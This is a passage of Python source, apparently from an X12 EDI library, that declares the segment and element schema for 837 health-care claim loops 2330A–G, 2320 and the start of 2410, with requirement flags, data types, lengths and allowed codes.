codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, 
codes=[], ), ), ), Segment( "N3", Properties( desc="Other Subscriber Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Subscriber City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Subscriber Secondary Identification", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference 
Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330B = Loop( "2330B", Properties( desc="Other Payer Name", looptype="", position="3250", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Other Payer Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Payer Address", position="3320", repeat="1", req_sit="S", syntax="", ), 
Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Payer City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DTP", Properties( desc="Claim Check or Remittance Date", position="3450", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Secondary Identifier", position="3550", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", 
req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Prior Authorization Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Referral Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Adjustment Indicator", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), 
position=1, codes=["T4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Control Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330C = Loop( "2330C", Properties( desc="Other Payer Referring Provider", looptype="", position="3250", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Referring Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", 
Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Referring Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330D = Loop( "2330D", Properties( desc="Other Payer Rendering Provider", looptype="", position="3650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Rendering Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( 
"NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Rendering Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( 
"C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330E = Loop( "2330E", Properties( desc="Other Payer Service Facility Location", looptype="", position="4650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Service Facility Location", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other 
Payer Service Facility Location Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330F = Loop( "2330F", Properties( desc="Other Payer Supervising Provider", looptype="", position="5650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Supervising Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( 
desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Supervising Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330G = Loop( "2330G", Properties( desc="Other Payer Billing Provider", looptype="", position="6350", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Billing Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), 
Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Billing Provider Secondary Identification", position="3550", repeat="2", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2320 = Loop( "2320", Properties( desc="Other Subscriber Information", looptype="", position="2900", repeat="10", req_sit="S", ), Segment( "SBR", Properties( desc="Other Subscriber Information", position="2900", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( 
desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", "U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["01", "18", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "CAS", Properties( desc="Claim Level Adjustments", position="2950", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( 
"CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), 
Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Payer Paid Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["D"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Coordination of Benefits (COB) Total Non-Covered Amount", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["A8"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="3000", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "OI", Properties( desc="Other Insurance Coverage Information", position="3100", repeat="1", req_sit="R", syntax="", ), Element( "OI01", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=1, codes=[], ), ), Element( "OI02", Properties( desc="Claim 
Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "OI03", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["N", "W", "Y"], ), ), Element( "OI04", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=4, codes=["P"], ), ), Element( "OI05", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=5, codes=[], ), ), Element( "OI06", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["I", "Y"], ), ), ), Segment( "MOA", Properties( desc="Outpatient Adjudication Information", position="3200", repeat="1", req_sit="S", syntax="", ), Element( "MOA01", Properties( desc="Percentage as Decimal", req_sit="S", data_type=("R", "1", "10"), position=1, codes=[], ), ), Element( "MOA02", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "MOA03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "MOA04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "MOA05", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=5, codes=[], ), ), Element( "MOA06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "MOA07", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=7, codes=[], ), ), Element( "MOA08", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "MOA09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), ), parsed_837_2330A, parsed_837_2330B, 
parsed_837_2330C, parsed_837_2330D, parsed_837_2330E, parsed_837_2330F, parsed_837_2330G, ) parsed_837_2410 = Loop( "2410", Properties( desc="Drug Identification", looptype="", position="4940", repeat="1", req_sit="S", ), Segment( "LIN", Properties( desc="Drug Identification", position="4930", repeat="1", req_sit="R", syntax="P0405 P0607 P0809 P1011 P1213 P1415 P1617 P1819 P2021 P2223 P2425 P2627 P2829 P3031", ), Element( "LIN01", Properties( desc="Assigned Identification", req_sit="N", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "LIN02", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["EN", "EO", "HI", "N4", "ON", "UK", "UP"], ), ), Element( "LIN03", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=3, codes=[], ), ), Element( "LIN04", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Element( "LIN05", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=5, codes=[], ), ), Element( "LIN06", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "LIN07", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), Element( "LIN08", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "LIN09", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=9, codes=[], ), ), Element( "LIN10", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "LIN11", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=11, codes=[], ), ), Element( "LIN12", Properties( desc="Product/Service ID Qualifier", req_sit="N", 
